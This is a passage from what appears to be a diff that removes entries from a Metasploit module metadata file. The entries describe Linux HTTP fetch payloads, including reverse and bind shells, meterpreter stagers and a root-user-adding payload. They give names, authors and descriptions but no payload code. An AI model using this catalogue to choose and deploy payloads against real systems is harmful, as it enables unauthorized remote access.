"payload/cmd/linux/http/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Brent Cook ", - "ricky" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/bind_tcp" - }, - "payload_cmd/linux/http/x64/meterpreter/reverse_sctp": { - "name": "HTTP Fetch, Reverse SCTP Stager", - "fullname": "payload/cmd/linux/http/x64/meterpreter/reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Brent Cook ", - "RageLtMan " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/meterpreter/reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/meterpreter/reverse_sctp", - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/reverse_sctp" - }, - "payload_cmd/linux/http/x64/meterpreter/reverse_tcp": { - "name": "HTTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Brent Cook ", - "ricky", - "tkmru" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/reverse_tcp" - }, - "payload_cmd/linux/http/x64/meterpreter_reverse_http": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/x64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/http/x64/meterpreter_reverse_https": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/x64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/http/x64/meterpreter_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/x64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/x64/pingback_bind_tcp": { - "name": "HTTP Fetch, Linux x64 Pingback, Bind TCP Inline", - "fullname": "payload/cmd/linux/http/x64/pingback_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nAccept a connection from attacker and report UUID (Linux x64)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/pingback_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/pingback_bind_tcp", - "staged": false - }, - "payload_cmd/linux/http/x64/pingback_reverse_tcp": { - "name": "HTTP Fetch, Linux x64 Pingback, Reverse TCP Inline", - "fullname": "payload/cmd/linux/http/x64/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and report UUID (Linux x64)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/x64/shell/bind_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Stager", - "fullname": "payload/cmd/linux/http/x64/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/shell/bind_tcp", - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/bind_tcp" - }, - "payload_cmd/linux/http/x64/shell/reverse_sctp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse SCTP Stager", - "fullname": "payload/cmd/linux/http/x64/shell/reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky", - "RageLtMan " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/shell/reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/shell/reverse_sctp", - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/reverse_sctp" - }, - "payload_cmd/linux/http/x64/shell/reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/x64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky", - "tkmru" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/reverse_tcp" - }, - "payload_cmd/linux/http/x64/shell_bind_ipv6_tcp": { - "name": "HTTP Fetch, Linux x64 Command Shell, Bind TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/http/x64/shell_bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "epi " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/shell_bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/shell_bind_ipv6_tcp", - "staged": false - }, - "payload_cmd/linux/http/x64/shell_bind_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/http/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/http/x64/shell_bind_tcp_random_port": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Random Port Inline", - "fullname": "payload/cmd/linux/http/x64/shell_bind_tcp_random_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Geyslan G. Bem " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/shell_bind_tcp_random_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/shell_bind_tcp_random_port", - "staged": false - }, - "payload_cmd/linux/http/x64/shell_find_port": { - "name": "HTTP Fetch, Linux Command Shell, Find Port Inline", - "fullname": "payload/cmd/linux/http/x64/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "mak" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/shell_find_port", - "staged": false - }, - "payload_cmd/linux/http/x64/shell_reverse_ipv6_tcp": { - "name": "HTTP Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/http/x64/shell_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "epi " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell over IPv6", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/shell_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/shell_reverse_ipv6_tcp", - "staged": false - }, - "payload_cmd/linux/http/x64/shell_reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/http/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/x86/adduser": { - "name": "HTTP Fetch, Linux Add User", - "fullname": "payload/cmd/linux/http/x86/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "vlad902 ", - "spoonm " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nCreate a new user with UID 0", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/adduser", - "staged": false - }, - "payload_cmd/linux/http/x86/chmod": { - "name": "HTTP Fetch, Linux Chmod", - "fullname": "payload/cmd/linux/http/x86/chmod", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "kris katterjohn " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nRuns chmod on specified file with specified mode", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/chmod", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/chmod", - "staged": false - }, - "payload_cmd/linux/http/x86/exec": { - "name": "HTTP Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/http/x86/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "vlad902 ", - "Geyslan G. Bem " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nExecute an arbitrary command or just a /bin/sh shell", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm", - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/x86_execve_dyn.asm" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/exec", - "staged": false - }, - "payload_cmd/linux/http/x86/generic/debug_trap": { - "name": "HTTP Fetch, Generic x86 Debug Trap", - "fullname": "payload/cmd/linux/http/x86/generic/debug_trap", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "robert " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nGenerate a debug trap in the target process", - "references": [], - "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/generic/debug_trap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "generic/debug_trap", - "staged": false - }, - "payload_cmd/linux/http/x86/generic/tight_loop": { - "name": "HTTP Fetch, Generic x86 Tight Loop", - "fullname": "payload/cmd/linux/http/x86/generic/tight_loop", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "jduck " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nGenerate a tight loop in the target process", - "references": [], - "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/generic/tight_loop", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "generic/tight_loop", - "staged": false - }, - "payload_cmd/linux/http/x86/meterpreter/bind_ipv6_tcp": { - "name": "HTTP Fetch, Bind IPv6 TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "kris katterjohn ", - "egypt " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for an IPv6 connection (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_ipv6_tcp" - }, - "payload_cmd/linux/http/x86/meterpreter/bind_ipv6_tcp_uuid": { - "name": "HTTP Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "kris katterjohn ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" - }, - "payload_cmd/linux/http/x86/meterpreter/bind_nonx_tcp": { - "name": "HTTP Fetch, Bind TCP Stager", - "fullname": "payload/cmd/linux/http/x86/meterpreter/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for a connection", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter/bind_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_nonx_tcp" - }, - "payload_cmd/linux/http/x86/meterpreter/bind_tcp": { - "name": "HTTP Fetch, Bind TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/http/x86/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for a connection (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_tcp" - }, - "payload_cmd/linux/http/x86/meterpreter/bind_tcp_uuid": { - "name": "HTTP Fetch, Bind TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/http/x86/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for a connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_tcp_uuid" - }, - "payload_cmd/linux/http/x86/meterpreter/find_tag": { - "name": "HTTP Fetch, Find Tag Stager", - "fullname": "payload/cmd/linux/http/x86/meterpreter/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nUse an established connection", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter/find_tag", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/find_tag" - }, - "payload_cmd/linux/http/x86/meterpreter/reverse_ipv6_tcp": { - "name": "HTTP Fetch, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/linux/http/x86/meterpreter/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "kris katterjohn " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to attacker over IPv6", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": 